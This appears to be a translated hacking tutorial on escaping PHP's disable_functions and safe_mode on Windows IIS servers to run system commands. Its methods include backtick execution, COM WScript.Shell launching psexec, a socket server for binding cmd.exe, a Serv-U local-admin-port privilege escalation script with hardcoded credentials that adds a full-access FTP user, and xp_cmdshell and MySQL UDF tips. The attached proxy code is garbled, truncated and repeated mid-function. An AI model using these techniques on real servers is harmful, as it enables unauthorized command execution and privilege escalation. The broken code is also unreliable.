From WIN2000 to WIN XP, and then to WIN2003, the improvement in MS IIS server security is obvious. In WIN2000, an ordinary PHP SHELL can defeat it; in WIN XP, even if Safe mode = off, you cannot use functions such as system() to execute system commands, but we can still use the com() function to break through; As of WIN 2003, even if IIS and PHP are installed by default, you may not be able to use system() or com() to defeat them. At this time you have to use some new methods to make breakthroughs.
1. Breakthrough of disable_functions
In php-4.0.1 or above, a function disable_functions is introduced in php.ini. This function is quite useful and can be used to disable some functions. For example, if you add disable_functions = passthru exec system popen to php.ini, then when executing these functions, you will be prompted with Warning: system() has been disabled for security reasons, and the program will terminate. But there is no way to execute system commands. Because PHP uses many perl features, for example, you can also use (`) to execute commands. The sample code is as follows:
<?$output = `ls -al`;echo "<pre>$output</pre>";?>
It is said that this can only be avoided by setting safe_mode to on, but the last time I used it on a foreign server, it still failed. People are not always so lucky:)
2.When
applying the dl() function
When any of PHP's internal command execution numbers and '' cannot be used, you can try dl(). This method can only be used with safe mode=off because it is disabled in safe mode. Using dl() you can directly call the W32api function. Unfortunately, this extension has been moved to the PECL library and is no longer bound since PHP 5.1.0 or below. The following is an example from the manual:
// Load this extension
dl("php_w32api.dll");
// Register the GetTickCount function, from kernel32.dll
w32api_register_function("kernel32.dll",
"GetTickCount",
"long");
// Register MessageBoxA function, from User32.dll
w32api_register_function("User32.dll",
"MessageBoxA",
"long");
// Get boot time information
$ticks = GetTickCount();
// Convert to easy-to-understand text
$secs = floor ($ticks / 1000);
$mins = floor($secs / 60);
$hours = floor($mins / 60);
$str = sprintf("You have been using your computer for:".
"rn %d Milliseconds, or rn %d Seconds".
"or rn %d mins orrn %d hours %d mins.",
$ticks,
$secs,
$mins,
$hours,
$ mins - ($hours*60));
// Display a message dialog box with only an OK button and the boot time text
MessageBoxA(NULL,
$str,
"Uptime Information",
MB_OK);
?>
Unfortunately I don't understand it yet I have a thorough understanding of dl() and W32api, so I won’t give random examples to avoid misleading readers.
3. Application of COM and .Net (Windows) functions
COM (Component Object Model) is a software specification developed by Microsoft. It is used to develop object-oriented and compiled software components. It allows the software to be abstracted into binary components, mainly used on windows platform.
The Windows version of PHP already has built-in support for this extension module. There is no need to load any additional extension libraries to use COM functions. Its usage is similar to the syntax for creating a class in C++ or Java, and the COM class name is passed to the constructor as a parameter. For example, use "WScript.Shell" in PHP to execute system commands:
$cmd="E:/cert/admin/psexec.exe";
if($com=new COM("WScript.Shell")) echo "yes" ;
if(!$cmd1=$com->exec($cmd))
{
echo "can not exec()";
}
if(!$cmd2=$cmd1->stdout())
{
echo "can not stdout() ";
}
if(!$cmd3=$cmd2->readall())
{
echo "can not readall()";
}
echo $cmd3;
?>
Figure 1 is an example I wrote to execute psexec.exe.
The meaning of this code is exactly the same as that of ASP. Of course, you can also call "ADODB.Connection" like ASP. Using this component combined with the jet2 overflow vulnerability, you may be able to get a Shell under PHP Saft mode=ON.
//create the database connection
$conn = new COM("ADODB.Connection");
$dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");
$ conn->Open($dsn);
//pull the data through SQL string
$rs = $conn->Execute("select clients from web");
…..
?>
.Net function can only run on PHP 5, Of course, it requires the support of ".Net runtime", and this is an experimental module of PHP that is not yet fully functional, so I will not discuss it here.
4. Application of Java() function
This method is suitable for safe mode=on. To use the JAVA module server, you must install a Java virtual machine in advance, and turn on the with-java option during PHP installation and configuration. The code is as follows:
[JAVA]
; This is the path to php_java.jar
; java.class.path = . php_java.jar
;JDK path
;Java.home = f:jdk1.3.0
;Path to the virtual machine
;Java.library=f:jdk1.3.0jrebinhostspotjvm.dll
is the same as COM, To create a class in Java (not just JavaBeans) simply pass the JAVA class name as a parameter to the constructor. Here is an example from the manual:
// This example is only intended to be run as a CGI.
$frame = new Java('java.awt.Frame', 'PHP');
$button = new Java('java. awt.Button', 'Hello Java World!');
$frame->add('North', $button);
$frame->validate();
$frame->pack();
$frame->visible = True ;
$thread = new Java('java.lang.Thread');
$thread->sleep(10000);
$frame->dispose();
?>
Unfortunately, there are not many PHP servers that can truly support JAVA, so in There is no need to discuss this much.
5. Application of socket() function
Socket is an extremely powerful module in PHP. If you use a high-level, abstract interface (socket opened by fsockopen() and psockopen functions), you do not need to open "php_sockets.dll" of. But if you want to use the complete socket function block, you must set it like this in php.ini:
; Windows Extensions
; Note that MySQL and ODBC support is now built in, so no dll is needed for it.
……..
; Remove the following sentence The semicolon at the front
; extension=php_sockets.dll
uses PHP's socket function block to implement port forwarding/redirection, packet sniffing, local overflow and other functions. It can do most of what nc can do. Moreover, it can also be used to construct a TCP/UDP server. At the same time, I think it is also the best way to break through the server security policy. The following is an example of opening a port on the server to construct a TCP server. You can use it to bundle the server's cmd.exe:
//Construct a TCP service on the server
//This example requires the support of php_sockets.dll
//After execution You can use "telnet 127.0.0.1 1020" to connect
error_reporting(E_ALL);
/* Allow the script to hang around waiting for connections. */
set_time_limit(0);
/* Turn on implicit output flushing so we see what we're getting
* as it comes in. */
ob_implicit_flush();
//Bind IP and port on the server
$address = '127.0.0.1';
$port = 1020;
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP) ) < 0) {
echo "socket_create() failed: reason: " . socket_strerror($sock) . "n";
}
if (($ret = socket_bind($sock, $address, $port)) < 0) {
echo "socket_bind() failed: reason: " . socket_strerror($ret) . "n";
}
if (($ret = socket_listen($sock, 5)) < 0) {
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "n";
}
do {
if (($msgsock = socket_accept($sock)) < 0) {
echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . " n";
break;
}
/* Send instructions. */
$msg = "nWelcome to the PHP Test Server. n" .
"To quit, type 'quit'. To shut down the server type 'shutdown'. n";
socket_write($msgsock, $msg, strlen($msg));
do {
if (false === socket_recv($msgsock, $buf, 1024, 0)) {
echo "socket_read() failed: reason: " . socket_strerror($ret) . "n";
break 2;
}
if (!$buf = trim($buf)) {
continue;
}
if ($buf == 'quit') {
break;
}
if ($buf == 'shutdown') {
socket_close($msgsock);
break 2;
}
$talkback = "PHP: You said '$buf'.n";
socket_write($msgsock, $talkback, strlen($talkback));
echo "$bufn";
//The following processes the received buf
/*eg: for example
$buf="cmd.exe /c netstat –an";
$pp = popen('$buf ', 'r');
While ($read = fgets($pp, 2096))
echo $read;
pclose($pp);
*/
} while (true);
socket_close($msgsock);
} while (true);
socket_close($sock);
?>
In fact, many hosts do not load php_sockets.dll. Fortunately, the "fsockopen" function that does not require socket module support is enough for us to use. Because as long as there is "fsockopen", we can freely read and write ports on this machine that are not open to the outside world. Using fsockopen to read and write the local management port 43958 of serv-u (note: this port cannot be connected externally) for privilege escalation is a typical example:
$adminuser="LocalAdministrator";
$adminpass=" #l@$ak# .lk;0@P ”;
$adminport=" 43958";
$fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8);
if (!$fp) {
echo "$errstr ( $errno)
n";
} else {
//$shellcode can be written
// fputs ($fp, $shellcode);
fputs ($fp, "USER ".$adminuser."rn");
sleep ( 1);
fputs ($fp, "PASS ".$adminpass."rn");
sleep (1);
fputs ($fp, "SITE MAINTENANCErn");
sleep (1);
fputs ( $fp, "-SETUSERSETUPrn");
fputs ($fp, "-IP=".$addr."rn");
fputs ($fp, "-PortNo=".$ftpport." rn");
fputs ($fp, "-User=".$user."rn");
fputs ($fp, "-Password=".$password."rn") ;
fputs ($fp, "-HomeDir=".$homedir."rn");
fputs ($fp, "-LoginMesFile=rn");
fputs ($fp, "-Disable=0 rn");
fputs ($fp, "-RelPaths=0rn");
fputs ($fp, "-NeedSecure=0rn");
fputs ($fp, "-HideHidden=0 rn");
fputs ($fp, "-AlwaysAllowLogin=0rn");
fputs ($fp, "-ChangePassword=1rn");
fputs ($fp, "-QuotaEnable= 0rn");
fputs ($fp, "-MaxUsersLoginPerIP=-1rn");
fputs ($fp, "-SpeedLimitUp=-1rn");
fputs ($fp, " -SpeedLimitDown=-1rn");
fputs ($fp, "-MaxNrUsers=-1rn");
fputs ($fp, "-IdleTimeOut=600rn");
fputs ($ fp, "-SessionTimeOut=-1rn");
fputs ($fp, "-Expire=0rn");
fputs ($fp, "-RatioUp=1rn");
fputs ($fp, "-RatioDown=1rn");
fputs ($fp, "-RatiosCredit=0rn");
fputs ($fp, "-QuotaCurrent=0rn");
fputs ($fp, "-QuotaMaximum=0rn");
fputs ($fp, "-Maintenance=Systemrn");
fputs ($fp, "-PasswordType=Regularrn") ;
fputs ($fp, "-Ratios=Nonern");
fputs ($fp, " Access=".$homedir."|RWAMELCDPrn");
fputs ($fp, "QUITr n");
sleep (1);
while (!feof($fp)) {
echo fgets ($fp, 128);
}
}
?>
You can also use fsockopen to write an HTTP proxy to access the external network or the local computer. Externally accessible websites. I have a complete HTTPProxy (Figure 4) with a long code. Interested readers can take a look.
6. The MYSQL/MSSQL interface
is different from Linux in that mysql/MSSQL under windows is generally run as a system administrator. Therefore, as long as you can get the root/sa password in the local SQL database, you can use it directly. PHP connects to the database to execute system commands.
Executing system commands in Mysql requires exploiting the vulnerability of the user-defined function "MySQL UDF Dynamic Library". In MSSQL, as long as you connect to the database, you can directly call the "master..xp_cmdshell" extended execution command. The permissions are of course system permissions.
To summarize: Due to different versions of the system, IIS, and PHP, the above-mentioned breakthrough methods may change. PHP also has many extended functions that can be used. Get out of the system() system command execution functions , you may break through the restrictions of the system security policy!
Attached is the proxy.php code
error_reporting(E_ALL);
/*
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software
// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//-------------------------- -----------------------------------------------
// Class : PHProxy
// Author: ultimategamer00 (Abdullah A.)
// Last Modified: 6:28 PM 6/22/2004
*/
function __stripslashes($str)
{
return get_magic_quotes_gpc() ? stripslashes($str) : $str;
}
if (!function_exists('str_rot13'))
{
function str_rot13($str)
{
static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',
'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');
return strtr($str, $alpha[0], $alpha[1] );
}
}
class PHProxy
{
var $allowed_hosts = array();
var $version;
var $script_url;
var $url;
var $url_segments;
var $flags = array('include_form' => 1, 'remove_scripts' => 1 , 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);
var $socket;
var $content_type;
var $request_headers;
var $post_body;
var $response_headers;
var $response_body;
function PHProxy( $flags = 'previous')
{
$this->version = '0.2';
$this->script_url = 'http'
. (isset(
function set_request_headers()
{
$headers = " " . (isset($this->url_segments ['query']) ? "?" : '') . " HTTP/1.0rn";
$headers .= "Host: :rn";
$headers .= "User-Agent: Mozilla/ 4.0 (compatible; MSIE 6.0; Windows NT 5.1)rn";
$headers .= "Accept: text/xml, application/xml, application/xhtml+xml, text/html; q=0.9, text/plain; q=0.8, video/x-mng, image/png, image/jpeg, image/gif; q=0.2, */*; q=0.1rn";
$headers .= "Connection: closer n";
if ($this->flags['show_referer'] == 1)
{
$headers .= "Referer: rn";
}
$cookies = $this->get_cookies();
$headers .= $ cookies != '' ? "Cookie: $cookiesrn" : '';
if (
function set_request_headers()
{
$headers = " " . (isset($this->url_segments['query']) ? "? " : '') . " HTTP/1.0rn";
$headers .= "Host: :rn";
$headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)rn";
$headers .= "Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, video/x-mng , image/png, image/jpeg, image/gif;q=0.2,*/*;q=0.1rn";
$headers .= "Connection: closern";
if ($this-> flags['show_referer'] == 1)
{
$headers .= "Referer: rn";
}
$cookies = $this->get_cookies();
$headers .= $cookies != '' ? "Cookie: $cookiesrn" : '';
if (